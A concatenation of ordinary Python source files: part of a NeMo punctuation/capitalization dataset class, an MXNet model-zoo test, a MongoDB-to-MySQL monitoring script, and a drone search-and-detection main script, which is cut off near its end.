inp_iterator = tqdm(
zip(batch_beginnings, batch_sizes, batch_seq_lengths),
total=len(batch_beginnings),
desc="Batch building",
unit="batch",
)
else:
# In this case we report number of queries not number of batches
inp_iterator = zip(batch_beginnings, batch_sizes, batch_seq_lengths)
progress_made = 0
for start, size, length in inp_iterator:
batch_input_ids = pad(input_ids[start : start + size], length, self.tokenizer.pad_id)
batch_subtokens_mask = pad(subtokens_mask[start : start + size], length, False)
batch = {
"input_ids": batch_input_ids,
"subtokens_mask": batch_subtokens_mask,
"punct_labels": pad(
punct_labels[start : start + size], length, self.punct_label_ids[self.pad_label]
).astype(np.int64),
"capit_labels": pad(
capit_labels[start : start + size], length, self.capit_label_ids[self.pad_label]
).astype(np.int64),
}
if self.add_masks_and_segment_ids_to_batch:
batch_segment_ids, batch_input_mask, batch_loss_mask = create_masks_and_segment_ids(
batch_input_ids,
batch_subtokens_mask,
self.tokenizer.pad_id,
self.tokenizer.cls_id,
self.tokenizer.sep_id,
self.ignore_start_end,
self.ignore_extra_tokens,
)
batch['segment_ids'] = batch_segment_ids
batch['input_mask'] = batch_input_mask
batch['loss_mask'] = batch_loss_mask
batches.append(batch)
if self.batch_building_progress_queue is not None:
progress_made += size
if progress_made >= BATCH_BUILDING_PROGRESS_REPORT_PERIOD:
self.batch_building_progress_queue.put(progress_made)
progress_made = 0
if self.batch_building_progress_queue is not None:
self.batch_building_progress_queue.put(progress_made)
random.shuffle(batches)
return batches
def repack_batches_with_shuffle(self) -> None:
"""A function for proper shuffling of a dataset. Pytorch data loader shuffing will only permute batches."""
logging.info("Shuffling training dataset")
self.batches = self._pack_into_batches(
self.input_ids, self.subtokens_mask, self.punct_labels, self.capit_labels
)
def _calculate_and_save_label_frequencies(self, all_labels: List[np.ndarray], name: str) -> Dict[str, float]:
"""Calculates and saves labels frequencies in :attr:`label_info_save_dir`."""
merged_labels = itertools.chain.from_iterable(all_labels)
if self.verbose:
logging.info('Three most popular labels')
self.label_info_save_dir.mkdir(parents=True, exist_ok=True)
_, label_frequencies, _ = get_label_stats(
merged_labels, str(self.label_info_save_dir / f'label_count_{name}.tsv')
)
return label_frequencies
def save_labels_and_get_file_paths(
self, punct_labels_file_name: str, capit_labels_file_name: str
) -> Tuple[Path, Path]:
"""
Saves label ids into files located in ``self.label_info_save_dir``. Saved label ids are usually used for
``.nemo`` checkpoint creation.
The signatures of this method and the signature of the method
:meth:`~nemo.collections.nlp.data.token_classification.BertPunctuationCapitalizationTarredDataset.save_labels_and_get_file_paths`
must be identical.
Args:
punct_labels_file_name (:obj:`str`): a name of a punctuation labels file
capit_labels_file_name (:obj:`str`): a name of a capitalization labels file
Returns:
:obj:`Tuple[pathlib.Path, pathlib.Path]`: a tuple containing:
- :obj:`pathlib.Path`: a path to the saved punctuation labels file
- :obj:`pathlib.Path`: a path to the saved capitalization labels file
"""
nemo_dir = self.label_info_save_dir / LABEL_ID_DIR_FOR_NEMO_CHECKPOINT
punct_labels_file = nemo_dir / punct_labels_file_name
capit_labels_file = nemo_dir / capit_labels_file_name
save_label_ids(self.punct_label_ids, punct_labels_file)
save_label_ids(self.capit_label_ids, capit_labels_file)
return punct_labels_file, capit_labels_file
def __len__(self) -> int:
return len(self.batches)
def collate_fn(self, batches: List[Dict[str, np.ndarray]]) -> Dict[str, torch.Tensor]:
"""
Return zeroth batch from ``batches`` list passed for collating and casts ``'segment_ids'``, ``'punct_labels'``,
``'capit_labels'`` to types supported by
:class:`~nemo.collections.nlp.models.token_classification.punctuation_capitalization_model.PunctuationCapitalizationModel`.
All output tensors have shape ``[Batch, Time]``.
.. warning::
A ``batch_size`` parameter of a PyTorch data loader and sampler has to be ``1``.
Args:
batches (:obj:`List[Dict[str, np.ndarray]]`): a list containing 1 batch passed for collating
Returns:
:obj:`Dict[str, torch.Tensor]`: a batch dictionary with following items (for detailed description of batch
items see method :meth:`__getitem__`):
- ``'input_ids'`` (:obj:`torch.Tensor`): :obj:`torch.int32` tensor,
- ``'subtokens_mask'`` (:obj:`torch.Tensor`): :obj:`torch.bool` tensor,
- ``'punct_labels'`` (:obj:`torch.Tensor`): :obj:`torch.int64` tensor,
- ``'capit_labels'`` (:obj:`torch.Tensor`): :obj:`torch.int64` tensor,
- ``'segment_ids'`` (:obj:`torch.Tensor`): :obj:`torch.int32` tensor,
- ``'input_mask'`` (:obj:`torch.Tensor`): :obj:`torch.bool` tensor,
- ``'loss_mask'`` (:obj:`torch.Tensor`): :obj:`torch.bool` tensor.
"""
batch = {k: torch.as_tensor(v) for k, v in batches[0].items()}
batch['segment_ids'] = batch['segment_ids'].int()
batch['punct_labels'] = batch['punct_labels'].long()
batch['capit_labels'] = batch['capit_labels'].long()
return batch
def __getitem__(self, idx: int) -> Dict[str, np.ndarray]:
"""
Return a batch with index ``idx``. The values of a batch dictionary are numpy arrays of identical shapes
``[Batch, Time]``. Labels are identical for all tokens in a word. For example, if
- word ``'Tokenization'`` is tokenized into tokens ``['token', 'ization']``,
- it is followed by comma,
then punctuation labels are ``[',', ',']`` and capitalization labels are ``['U', 'U']`` (``'U'`` is a label
for words which start with upper case character).
Args:
idx: an index of returned batch
Returns:
:obj:`Dict[str, np.ndarray]`: a dictionary with items:
- ``'input_ids'`` (:obj:`numpy.ndarray`): :obj:`numpy.int32` array containing encoded tokens,
- ``'subtokens_mask'`` (:obj:`numpy.ndarray`): :obj:`bool` array which elements are ``True`` if they
correspond to first token in a word,
- ``'punct_labels'`` (:obj:`numpy.ndarray`): :obj:`numpy.int32` array containing encoded punctuation
labels,
- ``'capit_labels'`` (:obj:`numpy.ndarray`): :obj:`numpy.int32` array containing encoded capitalization
labels.
- ``'segment_ids'`` (:obj:`numpy.ndarray`): :obj:`numpy.int8` array filled with zeros (BERT token types
in HuggingFace terminology) (if ``self.add_masks_and_segment_ids_to_batch`` is ``False``, then this
items is missing),
- ``'input_mask'`` (:obj:`numpy.ndarray`): :obj:`bool` array which elements are ``True`` if corresponding
token is not a padding token (if ``self.add_masks_and_segment_ids_to_batch`` is ``False``, then this
items is missing),
- ``'loss_mask'`` (:obj:`numpy.ndarray`): :obj:`bool` array which elements are ``True`` if loss is
computed for corresponding token. See more in description of constructor parameters
``ignore_start_end``, ``ignore_extra_tokens`` (if ``self.add_masks_and_segment_ids_to_batch`` is
``False``, then this items is missing).
"""
return self.batches[idx]
|
test_gluon_model_zoo.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import mxnet as mx
from mxnet.gluon.model_zoo.vision import get_model
import sys
from common import with_seed
import multiprocessing
import pytest
def eprint(*args, **kwargs):
print(*args, file=sys.stderr, **kwargs)
@with_seed()
@pytest.mark.parametrize('model_name', [
'resnet18_v1', 'resnet34_v1', 'resnet50_v1', 'resnet101_v1', 'resnet152_v1',
'resnet18_v2', 'resnet34_v2', 'resnet50_v2', 'resnet101_v2', 'resnet152_v2',
'vgg11', 'vgg13', 'vgg16', 'vgg19',
'vgg11_bn', 'vgg13_bn', 'vgg16_bn', 'vgg19_bn',
'alexnet', 'inceptionv3',
'densenet121', 'densenet161', 'densenet169', 'densenet201',
'squeezenet1.0', 'squeezenet1.1',
'mobilenet1.0', 'mobilenet0.75', 'mobilenet0.5', 'mobilenet0.25',
'mobilenetv2_1.0', 'mobilenetv2_0.75', 'mobilenetv2_0.5', 'mobilenetv2_0.25'
])
def test_models(model_name):
pretrained_to_test = set(['mobilenetv2_0.25'])
test_pretrain = model_name in pretrained_to_test
model = get_model(model_name, pretrained=test_pretrain, root='model/')
data_shape = (2, 3, 224, 224) if 'inception' not in model_name else (2, 3, 299, 299)
eprint('testing forward for %s' % model_name)
print(model)
if not test_pretrain:
model.initialize()
model(mx.nd.random.uniform(shape=data_shape)).wait_to_read()
def parallel_download(model_name):
model = get_model(model_name, pretrained=True, root='./parallel_download')
print(type(model))
@with_seed()
@pytest.mark.skip(reason='MXNet is not yet safe for forking. Tracked in #17782.')
def test_parallel_download():
processes = []
name = 'mobilenetv2_0.25'
for _ in range(10):
p = multiprocessing.Process(target=parallel_download, args=(name,))
processes.append(p)
for p in processes:
p.start()
for p in processes:
p.join()
|
check_mongodb.py
|
#!/usr/bin/env python
#coding:utf-8
import os
import sys
import string
import time
import datetime
import MySQLdb
import pymongo
import bson
import logging
import logging.config
logging.config.fileConfig("etc/logger.ini")
logger = logging.getLogger("wlblazers")
path='./include'
sys.path.insert(0,path)
import functions as func
from multiprocessing import Process;
def check_mongodb(host,port,user,passwd,server_id,tags):
try:
func.mysql_exec("insert into mongodb_status_his SELECT *,LEFT(REPLACE(REPLACE(REPLACE(create_time,'-',''),' ',''),':',''),12) from mongodb_status where server_id='%s';" %(server_id),'')
func.mysql_exec("delete from mongodb_status where server_id='%s';" %(server_id),'')
#connect = pymongo.Connection(host,int(port))
client = pymongo.MongoClient(host, int(port))
db = client['admin']
db.authenticate(user,passwd)
serverStatus=client.admin.command(bson.son.SON([('serverStatus', 1), ('repl', 2)]))
time.sleep(1)
serverStatus_2=client.admin.command(bson.son.SON([('serverStatus', 1), ('repl', 2)]))
connect = 1
ok = int(serverStatus['ok'])
version = serverStatus['version']
uptime = serverStatus['uptime']
connections_current = serverStatus['connections']['current']
connections_available = serverStatus['connections']['available']
globalLock_activeClients = serverStatus['globalLock']['activeClients']['total']
globalLock_currentQueue = serverStatus['globalLock']['currentQueue']['total']
mem_bits = serverStatus['mem']['bits']
mem_resident = serverStatus['mem']['resident']
mem_virtual = serverStatus['mem']['virtual']
mem_supported = serverStatus['mem']['supported']
mem_mapped = serverStatus['mem']['mapped']
mem_mappedWithJournal = serverStatus['mem']['mappedWithJournal']
network_bytesIn_persecond = int(serverStatus_2['network']['bytesIn']) - int(serverStatus['network']['bytesIn'])
network_bytesOut_persecond = int(serverStatus_2['network']['bytesOut']) - int(serverStatus['network']['bytesOut'])
network_numRequests_persecond = int(serverStatus_2['network']['numRequests']) - int(serverStatus['network']['numRequests'])
opcounters_insert_persecond = int(serverStatus_2['opcounters']['insert']) - int(serverStatus['opcounters']['insert'])
opcounters_query_persecond = int(serverStatus_2['opcounters']['query']) - int(serverStatus['opcounters']['query'])
opcounters_update_persecond = int(serverStatus_2['opcounters']['update']) - int(serverStatus['opcounters']['update'])
opcounters_delete_persecond = int(serverStatus_2['opcounters']['delete']) - int(serverStatus['opcounters']['delete'])
opcounters_command_persecond = int(serverStatus_2['opcounters']['command']) - int(serverStatus['opcounters']['command'])
#replset
try:
repl=serverStatus['repl']
setName=repl['setName']
replset=1
if repl['secondary']== True:
repl_role='secondary'
repl_role_new='s'
else:
repl_role='master'
repl_role_new='m'
except:
replset=0
repl_role='master'
repl_role_new='m'
pass
##################### insert data to mysql server#############################
sql = "insert into mongodb_status(server_id,host,port,tags,connect,replset,repl_role,ok,uptime,version,connections_current,connections_available,globalLock_currentQueue,globalLock_activeClients,mem_bits,mem_resident,mem_virtual,mem_supported,mem_mapped,mem_mappedWithJournal,network_bytesIn_persecond,network_bytesOut_persecond,network_numRequests_persecond,opcounters_insert_persecond,opcounters_query_persecond,opcounters_update_persecond,opcounters_delete_persecond,opcounters_command_persecond) values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s);"
param = (server_id,host,port,tags,connect,replset,repl_role,ok,uptime,version,connections_current,connections_available,globalLock_currentQueue,globalLock_activeClients,mem_bits,mem_resident,mem_virtual,mem_supported,mem_mapped,mem_mappedWithJournal,network_bytesIn_persecond,network_bytesOut_persecond,network_numRequests_persecond,opcounters_insert_persecond,opcounters_query_persecond,opcounters_update_persecond,opcounters_delete_persecond,opcounters_command_persecond)
func.mysql_exec(sql,param)
role='m'
func.update_db_status_init(repl_role_new,version,host,port,tags)
except Exception, e:
logger_msg="check mongodb %s:%s : %s" %(host,port,e)
logger.warning(logger_msg)
try:
connect=0
sql="insert into mongodb_status(server_id,host,port,tags,connect) values(%s,%s,%s,%s,%s)"
param=(server_id,host,port,tags,connect)
func.mysql_exec(sql,param)
except Exception, e:
logger.error(e)
sys.exit(1)
finally:
sys.exit(1)
finally:
func.check_db_status(server_id,host,port,tags,'mongodb')
sys.exit(1)
def main():
servers = func.mysql_query('select id,host,port,username,password,tags from db_cfg_mongodb where is_delete=0 and monitor=1;')
logger.info("check mongodb controller started.")
if servers:
plist = []
for row in servers:
server_id=row[0]
host=row[1]
port=row[2]
username=row[3]
password=row[4]
tags=row[5]
p = Process(target = check_mongodb, args = (host,port,username,password,server_id,tags))
plist.append(p)
p.start()
for p in plist:
p.join()
else:
logger.warning("check mongodb: not found any servers")
logger.info("check mongodb controller finished.")
if __name__=='__main__':
main()
|
main.py
|
#import RPi.GPIO as GPIO
import time
import ctypes as ct
import shutil
import os
import glob
import numpy as np
import math
import logging
import json
import cv2
import utm
import matplotlib.pyplot as plt
from PIL import Image
import datetime
import multiprocessing
from pathlib import Path
import sys
detection = False
# to find the local modules we need to add the folders to sys.path
cur_file_path = Path(__file__).resolve().parent
sys.path.insert(1, cur_file_path )
sys.path.insert(1, os.path.join(cur_file_path, '..', 'PLAN') )
sys.path.insert(1, os.path.join(cur_file_path, '..', 'DET') )
sys.path.insert(1, os.path.join(cur_file_path, '..', 'LFR', 'python') )
sys.path.insert(1, os.path.join(cur_file_path, '..', 'CAM') )
import pyaos
detection = True
if detection :
from detector import Detector
from Planner import Planner
from FlyingControl import DroneFlyingControl
#from ..DRONE.DroneCom import DroneCommunication, ReadGPSReceivedLogFiles, ReadNewGPSReceivedLogFiles
from Renderer_Detector import Renderer
from CameraControl import CameraControl
test_server = True
if test_server :
from ServerUpload import ServerUpload
from DroneCom import DroneCommunication
from LFR_utils import hdr_mean_adjust
from PathVisualizer import Visualizer
from utils import download_file
from scipy.stats import circmean
import random
from scipy import interpolate
from statistics import mean
#New Changes to send Email
import email, smtplib, ssl
from email import encoders
from email.mime.base import MIMEBase
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import asyncio
import aiohttp
class InitializationClass():
_sitename = None
_DroneFlyingSpeed = 1 # in 0.1m/s
_FasterDroneFlyingSpeed = 3 # in 0.1m/s
_WayPointHoldingTime = 5
_PiWayPointRadiusCheck = 5.0
_TimeDelayForFlirConnection = 7.0
_ImageSamplingDistance = 1.0
_LowerThreshold = 0.05
_UpperThreshold = 0.10
_Flying_Height = 35
_MaxFlightTime = 20*60
_area_sides = None
_ReadfromFile = False
_Render = True
_Detect = True
_PrePlannedPath = False
_legacy_normalization = False
_AlwaysRenderSeparetly = True
_SimulateonCPU = False
_GridAlignedPathPlanning = True
_WritePoses = False
_DetectWithPiImages = False
_SendEmail = False
_ProjectIndividualImages = False
_GrabVideoFrames = True
_ContinuousIntegration = True
_ContinuousIntegrationAfterNoofImages = 10
_GridSideLength = 30
_RotationAngle = 0
_NormalizedDistance = 30
_pwmPin = 18
_dc = 10
_FieldofView = 43.10803984095769#43.50668199945787 #50.815436217896945
_device = "MYRIAD" # "CPU" or "MYRIAD"(compute stick)
_threshold = 0.05
_aug = "noAHE"
_yoloversion = "yolov4-tiny"
_source = '/data/camera/*/*.tiff'
_basedatapath = '../data'
_DroneAttached = False
_FlirAttached = False
_IntelStickAttached = True
_StartLatitudeGlobal = 0.0
_StartLongitudeGlobal = 0.0
_PiImagesFolder = None
_Download_Dest = None
_WritePosesPath = None
_SavProjPath = None
_ObjModelPath = None
_ObjModelImagePath = None
_LFRPath = None
_DemInfoJSOn = None
_DemInfoDict = None
_CenterUTMInfo = None
_CenterEast = None
_CenterNorth = None
_prob_map = None
_utm_center = None
_UpdatePathPlanning = False
def __init__(self, sitename, area_sides, ReadfromFile = False, DroneAttached = True, FlirAttached = True, IntelStickAttached = True, DroneFlyingSpeed = 10, Flying_Height = 35,
ImageSamplingDistance = 1.0, MaxFlightTime = 20*60, FieldofView = 43.10803984095769,GridSideLength = 30, GrabVideoFrames = True, StartLatitudeGlobal = 0.0, dc = 10,
StartLongitudeGlobal = 0.0 , FasterDroneFlyingSpeed = 10, WayPointHoldingTime = 5, PiWayPointRadiusCheck = 5.0, TimeDelayForFlirConnection = 7.0, pwmPin = 18,
LowerThreshold = 0.05, UpperThreshold = 0.10, Render = True, Detect = True, PrePlannedPath = False, legacy_normalization = False, _NormalizedDistance = 30,
AlwaysRenderSeparetly = True, SimulateonCPU = False, GridAlignedPathPlanning = True, ContinuousIntegration = True, ContinuousIntegrationAfterNoofImages = 10,
DetectWithPiImages = False, SendEmail = False, UpdatePathPlanningflag = False, sender_email = None, receiver_email = None, subject = None, body = None,
ProjectIndividualImages = False, WritePoses = False, aug = "noAHE", yoloversion = "yolov4-tiny",currentpath = '../data',uploadserver = False, baseserver = 'http://localhost:8080',prob_map = None
):
self._sitename = sitename
self._DroneFlyingSpeed = DroneFlyingSpeed # in 0.1m/s
self._FasterDroneFlyingSpeed = FasterDroneFlyingSpeed # in 0.1m/s
self._WayPointHoldingTime = WayPointHoldingTime
self._PiWayPointRadiusCheck = PiWayPointRadiusCheck
self._TimeDelayForFlirConnection = TimeDelayForFlirConnection
self._ImageSamplingDistance = ImageSamplingDistance
self._LowerThreshold = LowerThreshold
self._UpperThreshold = UpperThreshold
self._Flying_Height = Flying_Height
self._MaxFlightTime = MaxFlightTime
self._ReadfromFile = ReadfromFile
self._Render = Render
self._Detect = Detect
self._UpdatePathPlanning = UpdatePathPlanningflag
self._PrePlannedPath = PrePlannedPath
self._legacy_normalization = legacy_normalization
self._AlwaysRenderSeparetly = AlwaysRenderSeparetly
self._SimulateonCPU = SimulateonCPU
self._WritePoses = WritePoses
self._DetectWithPiImages = DetectWithPiImages
self._SendEmail = SendEmail
self._sender_email = sender_email
self._receiver_email = receiver_email
self._subject = subject
self._body = body
self._uploadserver = uploadserver
self._serveraddress = baseserver
self._ProjectIndividualImages = ProjectIndividualImages
self._GrabVideoFrames = GrabVideoFrames
self._ContinuousIntegration = ContinuousIntegration
self._ContinuousIntegrationAfterNoofImages = ContinuousIntegrationAfterNoofImages
self._area_sides = area_sides
self._GridAlignedPathPlanning = GridAlignedPathPlanning
self._GridSideLength = GridSideLength
self._prob_map = prob_map
self._RotationAngle = 0
self._NormalizedDistance = 30
self._pwmPin = pwmPin
self._dc = dc
self._FieldofView = FieldofView #50.815436217896945
self._DroneAttached = DroneAttached
self._FlirAttached = FlirAttached
self._IntelStickAttached = IntelStickAttached
self._device = "MYRIAD" if IntelStickAttached else "CPU" # "CPU" or "MYRIAD"(compute stick)
self._threshold = 0.05
self._aug = aug
self._yoloversion = yoloversion
self._source = '/data/camera/*/*.tiff'
self._basedatapath = currentpath
#if self._SimulateonCPU :
# self._basedatapath = 'D:\\Resilio\\ANAOS\\SIMULATIONS'
#else :
# self._basedatapath = '../data'#'../data'
self._StartLatitudeGlobal = StartLatitudeGlobal
self._StartLongitudeGlobal = StartLongitudeGlobal
if self._DetectWithPiImages :
self._PiImagesFolder = os.path.join(self._basedatapath,'..','data', sitename, 'PiRenderedResults')
self._Download_Dest = os.path.join(self._basedatapath,'..','data', sitename, 'Image')
self._WritePosesPath = os.path.join(self._basedatapath,'..','data', sitename, 'FlightPoses')
self._SavProjPath = os.path.join(self._basedatapath,'..','data', sitename, 'Projections')
self._ObjModelPath = os.path.join(self._basedatapath,'..','data', sitename, 'DEM','dem.obj')
self._ObjModelImagePath = os.path.join(self._basedatapath,'..','data', sitename, 'DEM','dem.png')
self._LFRPath = os.path.join(self._basedatapath,'..','data', sitename, 'DEM')
self._DemInfoJSOn = os.path.join(self._basedatapath,'..','data', sitename, 'DEM','dem_info.json')
with open(self._DemInfoJSOn) as json_file:
self._DemInfoDict = json.load(json_file)
self._CenterUTMInfo = self._DemInfoDict['centerUTM']
self._CenterEast = self._CenterUTMInfo[0]
self._CenterNorth = self._CenterUTMInfo[1]
if not self._PrePlannedPath :
self._utm_center = (self._CenterUTMInfo[0], self._CenterUTMInfo[1], self._CenterUTMInfo[2], self._CenterUTMInfo[3])
##############################################################################
##############################################################################
if __name__ == "__main__":
cur_file_path = Path(__file__).resolve().parent
base_url1 = 'http://140.78.99.183:80'
sitename = "test_flight_server_upload"
#ToDo --- Download All Files and Place in a Folder Locally
location_ref = 'test_flight_server_upload' #Find Way to Get locationref from the server
#download_file(base_url1,"locations",local_file = os.path.join(cur_file_path,'..','data',sitename,'DEM','dem.obj'),remote_file= location_ref + ".obj")
#download_file(base_url1,"locations",local_file = os.path.join(cur_file_path,'..','data',sitename,'DEM','dem.png'),remote_file= location_ref + ".png")
#download_file(base_url1,"locations",local_file = os.path.join(cur_file_path,'..','data',sitename,'DEM','dem_info.json'),remote_file= location_ref + ".json")
InitializedValuesClass = InitializationClass(sitename=sitename,area_sides = (90,90), ReadfromFile=False, DroneAttached=True,FlirAttached=True,
DroneFlyingSpeed=4,Flying_Height = 30, GridSideLength = 90, UpdatePathPlanningflag = False, SimulateonCPU=False, currentpath = cur_file_path)
#vis = Visualizer( InitializedValuesClass._LFRPath )
#PlanningAlgoClass = Planner( InitializedValuesClass._utm_center, InitializedValuesClass._area_sides, tile_distance = InitializedValuesClass._GridSideLength, prob_map=InitializedValuesClass._prob_map, debug=False,vis=None, results_folder=os.path.join(InitializedValuesClass._basedatapath,'FlightResults', InitializedValuesClass._sitename, 'Log'),gridalignedplanpath = InitializedValuesClass._GridAlignedPathPlanning)
CurrentGPSInfoQueue = multiprocessing.Queue(maxsize=200) # queue which stores gps tagged frames.
# reading with `CurrentGPSInfoQueue.get()` returns a dictionary of the form
# { 'Latitude' = # gps lat in degrees
# 'Longitude' = # gps lon in degrees
# 'Altitude' = # absolute altitude
# 'BaroAltitude' = # relative altitude = (value / 100)
# 'TargetHoldTime' = # Counter set to fixed value and counts down to 0 once it reaches waypoint
# 'CompassHeading' = # compass values in step of 2 degrees
# 'Image' = #Acquired frame from framegrabber
# }
SendWayPointInfoQueue = multiprocessing.Queue(maxsize=20) # waypoint information queue.get() returns a dictionary as:
# { 'Latitude': # value = int (gps lat x 10000000),
# 'Longitude': # value = int (gps lon x 10000000),
# 'Altitude': # value should be desired Altitude in m above starting height,
# 'Speed': # value should be desired speed in m/s,
# 'Index':
# }
RenderingQueue = multiprocessing.Queue(maxsize=200) # queue with geotagged frames with ~1m spacing
# in the form of a dictionary
# { 'Latitude' = #
# 'Longitude' = #
# 'Altitude' = #
# 'CompassHeading' = #
# 'Image' = #
# 'StartingHeight' = #
# 'Render' = # boolean indicating after adding which frame we should render
# 'UpdatePlanningAlgo' = # boolean indicating after adding which frame we should send the detections
# }
FrameQueue = multiprocessing.Queue(maxsize=200) # a queue element is a dictionary of the form
# { 'Frames': [img1, img2, ...],
# 'FrameTimes': [time1, time2, ...]
# }
DetectionInfoQueue = multiprocessing.Queue(maxsize=200) # a queue element is a dictionary of the form
# { 'PreviousVirtualCamPos': (gps_lat,gps_lon)),
# 'DLDetections': [{'gps':(gps_lat,gps_lon), 'conf': #}, {'gps':(gps_lat,gps_lon), 'conf': #}, ...]
# 'DetectedImageName' : #full written image name
# }
uploadqueue = multiprocessing.Queue(maxsize=200)
# events are only binary
DroneProcessEvent = multiprocessing.Event() # enabling this event (.set) stops the DroneCommunication process terminally (only do once)
FlyingProcessEvent = multiprocessing.Event() # if enabled (signaled from the DroneFlyingControl) the last waypoint has been reached
RenderingProcessEvent = multiprocessing.Event() # enabling this event (.set) stops the Renderer process terminally (only do once)
CameraProcessEvent = multiprocessing.Event() # enabling this event (.set) stops the camera process terminally (only do once)
GetFramesEvent = multiprocessing.Event() # enable if you want to retrieve recorded frames
RecordEvent = multiprocessing.Event() # enable if you want to record information while flying
upload_complete_event = multiprocessing.Event()
if InitializedValuesClass._ReadfromFile:
GPSReceivedLogFile = os.path.join(InitializedValuesClass._basedatapath,'FlightResults', InitializedValuesClass._sitename, 'GPSReceivedLog.log')
#GPSlogFileInfo = ReadGPSReceivedLogFiles(GPSReceivedLogFile)
GPSlogFileInfo = ReadNewGPSReceivedLogFiles(GPSReceivedLogFile)
else :
GPSlogFileInfo = []
#print(len(GPSReceivedLogFile))
CameraClass = CameraControl(FlirAttached=InitializedValuesClass._FlirAttached, AddsynthethicImage=False, out_folder = os.path.join(InitializedValuesClass._basedatapath,'..','data', InitializedValuesClass._sitename, 'log'))
# interpolation is done here.
DroneCommunicationClass = DroneCommunication(simulate=False,GPSLog=GPSlogFileInfo, interpolation=True,extrapolate=False, AddSynthethicImage=False,FlirAttached = InitializedValuesClass._FlirAttached,
out_folder=os.path.join(InitializedValuesClass._basedatapath,'..','data', InitializedValuesClass._sitename, 'log'))
# geotagged images are the output here (interpolation and adding GPS) -> input to FlyingControl
# many more images than are actually used
# check if waypoint reached, planning the next waypoints, send waypoint to DroneCom
# selects frames which are one meter apart and send it to Renderer
# Planner is in here
FlyingControlClass = DroneFlyingControl(sitename = InitializedValuesClass._sitename,CenterEast = InitializedValuesClass._CenterEast,CenterNorth = InitializedValuesClass._CenterNorth,
objectmodelpath=InitializedValuesClass._ObjModelPath,basedatapath=InitializedValuesClass._basedatapath,Render=True,
FlirAttached = InitializedValuesClass._FlirAttached,Flying_Height = InitializedValuesClass._Flying_Height,
DroneFlyingSpeed = InitializedValuesClass._DroneFlyingSpeed,RenderAfter = 2,CenterUTMInfo=InitializedValuesClass._CenterUTMInfo,
out_folder=os.path.join(InitializedValuesClass._basedatapath,'..','data', InitializedValuesClass._sitename, 'images'),
area_sides=InitializedValuesClass._area_sides,GridSideLength=InitializedValuesClass._GridSideLength,GridAlignedPathPlanning=InitializedValuesClass._GridAlignedPathPlanning,
prob_map=InitializedValuesClass._prob_map,UpdatePathPlanningflag = InitializedValuesClass._UpdatePathPlanning,
adddebugInfo=True)
# Renderer does undistortion, LFR, DET
RendererClass = Renderer(CenterUTMInfo=InitializedValuesClass._CenterUTMInfo,ObjModelPath=InitializedValuesClass._ObjModelPath,
Detect=True,ObjModelImagePath=InitializedValuesClass._ObjModelImagePath,basedatapath=InitializedValuesClass._basedatapath,
sitename=InitializedValuesClass._sitename,results_folder=os.path.join(InitializedValuesClass._basedatapath,'..','data',InitializedValuesClass._sitename, 'results'),
FieldofView=InitializedValuesClass._FieldofView,device="MYRIAD",adddebuginfo=True,uploadserver=True,baseserver=base_url1,locationid=location_ref)
serverclass = ServerUpload(serveraddress=base_url1,locationid= location_ref)
processes = []
uploadprocess = multiprocessing.Process(name = 'uploadprocess', target=serverclass.dummy_run, args=(uploadqueue, upload_complete_event))
processes.append(uploadprocess)
uploadprocess.start()
RenderProcess = multiprocessing.Process(name='RenderingProcess', target=RendererClass.RendererandDetectContinuous, args=(RenderingQueue, DetectionInfoQueue, uploadqueue, RenderingProcessEvent))
processes.append(RenderProcess)
RenderProcess.start()
time.sleep(2)
DroneCommunicationProcess = multiprocessing.Process(name='DroneCommunicationProcess',target=DroneCommunicationClass.DroneInfo, args=(CurrentGPSInfoQueue,SendWayPointInfoQueue, DroneProcessEvent, FrameQueue, GetFramesEvent, RecordEvent))
processes.append(DroneCommunicationProcess)
DroneCommunicationProcess.start()
FlyingControlProcess = multiprocessing.Process(name='FlyingControlProcess',target= FlyingControlClass.FlyingControl, args=(CurrentGPSInfoQueue,SendWayPointInfoQueue, RenderingQueue, DetectionInfoQueue, FlyingProcessEvent, RecordEvent))
processes.append(FlyingControlProcess)
FlyingControlProcess.start()
CameraFrameAcquireProcess = multiprocessing.Process(name='CameraFrameAcquireProcess', target=CameraClass.AcquireFrames, args=(FrameQueue, CameraProcessEvent, GetFramesEvent))
processes.append(CameraFrameAcquireProcess)
CameraFrameAcquireProcess.start()
while not FlyingProcessEvent.is_set():
time.sleep(10.0)
DroneProcessEvent.set()
CameraProcessEvent.set()
RenderingProcessEvent.set()
upload_complete_event.set()
time.sleep(25.0)
while not FrameQueue.empty():
FramesInfo = FrameQueue.get()
while not CurrentGPSInfoQueue.empty():
FramesInfo = CurrentGPSInfoQueue.get()
while not SendWayPointInfoQueue.empty():
FramesInfo = SendWayPointInfoQueue.get()
while not RenderingQueue.empty():
FramesInfo = RenderingQueue.get()
while not uploadqueue.empty():
FramesInfo = uploadqueue.get()
while not DetectionInfoQueue.empty():
FramesInfo = DetectionInfoQueue.get()
CurrentGPSInfoQueue.close()
SendWayPointInfoQueue.close()
FrameQueue.close()
RenderingQueue.close()
uploadqueue.close()
DetectionInfoQueue.close()
print('Wrapping Up all Process')
for process in processes:
process.join(5)
print('CameraFrameAcquireProcess.is_alive()', CameraFrameAcquireProcess.is_alive())
print('DroneCommunicationProcess.is_alive()', DroneCommunicationProcess.is_alive())
print('FlyingControlProcess.is_alive()', FlyingControlProcess.is_alive())
print('RenderProcess.is_alive()', RenderProcess.is_alive())
if CameraFrameAcquireProcess.is_alive() :
CameraFrameAcquireProcess.terminate()
CameraFrameAcquireProcess.join()
print('CameraFrameAcquireProcess.is_alive()', CameraFrameAcquireProcess.is_alive())
if DroneCommunicationProcess.is_alive() :
DroneCommunicationProcess.terminate()
DroneCommunicationProcess.join()
print('DroneCommunicationProcess.is_alive()', DroneCommunicationProcess.is_alive())
if FlyingControlProcess.is_alive() :
FlyingControlProcess.terminate()
FlyingControlProcess.join()
print('FlyingControlProcess.is_alive()', FlyingControlProcess.is_alive())
if RenderProcess.is_alive() :
RenderProcess.terminate()
